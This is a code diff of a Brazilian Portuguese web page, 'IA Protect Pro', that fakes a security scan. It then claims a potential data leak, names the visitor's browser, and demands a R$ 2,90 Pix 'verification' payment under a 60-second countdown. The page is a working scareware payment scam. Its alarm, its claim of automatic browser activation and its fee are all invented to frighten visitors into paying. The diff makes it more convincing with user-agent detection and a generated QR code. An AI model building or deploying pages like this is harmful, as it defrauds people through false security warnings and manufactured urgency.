--- a/index.html
+++ b/index.html
@@ -2,36 +2,48 @@
 <html lang="pt-br">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-  <title>IA Protect® – Verificação de Segurança</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>IA Protect Pro – Varredura de Segurança</title>
   <style>
     body {
       margin: 0;
-      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
-      background-color: #f7f9fb;
+      font-family: "Segoe UI", sans-serif;
+      background-color: #f8f9fb;
       color: #333;
       text-align: center;
-    }
-    .fade-in {
-      animation: fadeIn 1s ease-in-out;
-    }
-    @keyframes fadeIn {
-      from { opacity: 0; }
-      to { opacity: 1; }
-    }
-    .hidden {
-      display: none;
     }
     header {
       padding: 20px;
       font-weight: bold;
+      font-size: 18px;
     }
-    .main-content {
-      padding: 40px 20px;
+    .scan-section {
+      padding: 60px 20px;
     }
-    .qrcode {
-      width: 120px;
-      margin: 20px auto;
+    .spinner {
+      border: 8px solid #eee;
+      border-top: 8px solid #00c853;
+      border-radius: 50%;
+      width: 80px;
+      height: 80px;
+      animation: spin 2s linear infinite;
+      margin: 30px auto;
+    }
+    @keyframes spin {
+      0% { transform: rotate(0deg); }
+      100% { transform: rotate(360deg); }
+    }
+    .hidden {
+      display: none;
+    }
+    .alert {
+      color: red;
+      font-weight: bold;
+      margin-top: 10px;
+    }
+    .shield {
+      font-size: 50px;
+      margin-top: 30px;
     }
     .pix-box {
       background-color: #eee;
@@ -56,44 +68,57 @@
       margin-top: 20px;
       font-weight: bold;
     }
-    .shield {
-      margin-top: 30px;
-      font-size: 48px;
-    }
   </style>
 </head>
 <body>
-  <header>
-    🔒 IA Protect®
-  </header>
 
-  <div id="scan-animation" class="main-content">
-    <h2>Varredura em andamento...</h2>
-    <p>IA Protect está analisando a segurança da sua conexão.</p>
-    <p>Por favor, aguarde alguns instantes.</p>
+  <header>🔒 IA Protect Pro</header>
+
+  <!-- TELA 1: ANIMAÇÃO DE VARREDURA -->
+  <div id="scan" class="scan-section">
+    <h2>Varredura de segurança em andamento...</h2>
+    <div class="spinner"></div>
+    <p>Aguarde enquanto o IA Protect Pro analisa sua conexão.</p>
   </div>
 
-  <div id="security-screen" class="main-content hidden fade-in">
+  <!-- TELA 2: ALERTA E PAGAMENTO -->
+  <div id="alerta" class="hidden">
     <div class="shield">🛡️</div>
     <h2>Segurança de conexão ativada</h2>
-    <p style="color: red; font-weight: bold;">🚨 Vazamento de dados em potencial detectado.</p>
-    <p>O navegador <strong>Google Chrome</strong> ativou automaticamente o protocolo <strong>IA Protect Pro</strong>, com tecnologia baseada em Inteligência Artificial.</p>
+    <p class="alert">🚨 Vazamento de dados em potencial detectado.</p>
+    <p>O navegador <strong><span id="browser-name"></span></strong> ativou automaticamente o protocolo <strong>IA Protect Pro</strong>, com tecnologia baseada em Inteligência Artificial.</p>
     <p>Para concluir a proteção em tempo real e garantir estabilidade durante sua navegação, realize a autenticação abaixo:</p>
-    <br>
-    <p><strong>💳 Valor único de verificação: R$ 2,90</strong><br />(IA Protect opera por menos de $0.55 USD internacionalmente)</p>
-    <img class="qrcode" src="https://i.imgur.com/J7Xf2Qx.png" alt="QR Code Pix" />
+
+    <p style="margin-top: 20px;"><strong>🟡 Valor único de verificação: R$ 2,90</strong><br>
+    <small>(IA Protect opera por menos de $0.55 USD internacionalmente)</small></p>
+
+    <img src="https://api.qrserver.com/v1/create-qr-code/?size=150x150&data=00020126360014BR.GOV.BCB.PIX0111qrfakepixkey" alt="QR Code Pix"/>
+
     <p class="pix-box" id="pixCode">00020126360014BR.GOV.BCB.PIX0111qrfakepixkey</p>
     <button class="copy-btn" onclick="copyPix()">Copiar código Pix</button>
+
     <div class="countdown" id="countdown">Tempo restante: 60 segundos...</div>
   </div>
 
   <script>
-    // Mostrar tela de segurança após 5s
+    // Detectar navegador
+    function getBrowser() {
+      const ua = navigator.userAgent;
+      if (ua.includes("Chrome") && !ua.includes("Edg") && !ua.includes("OPR")) return "Google Chrome";
+      if (ua.includes("Firefox")) return "Mozilla Firefox";
+      if (ua.includes("OPR") || ua.includes("Opera")) return "Opera";
+      if (ua.includes("Edg")) return "Microsoft Edge";
+      return "Seu navegador";
+    }
+
+    // Trocar tela após 5s
     setTimeout(() => {
-      document.getElementById('scan-animation').classList.add('hidden');
-      document.getElementById('security-screen').classList.remove('hidden');
+      document.getElementById("scan").classList.add("hidden");
+      document.getElementById("alerta").classList.remove("hidden");
+      document.getElementById("browser-name").innerText = getBrowser();
     }, 5000);
 
+    // Copiar código Pix
     function copyPix() {
       const text = document.getElementById("pixCode").innerText;
       navigator.clipboard.writeText(text).then(() => {
@@ -101,7 +126,7 @@
       });
     }
 
-    // Contagem regressiva de 60 segundos
+    // Contagem de 60s
     let seconds = 60;
     const countdownEl = document.getElementById("countdown");
     const interval = setInterval(() => {
@@ -113,5 +138,6 @@
       }
     }, 1000);
   </script>
+
 </body>
 </html>
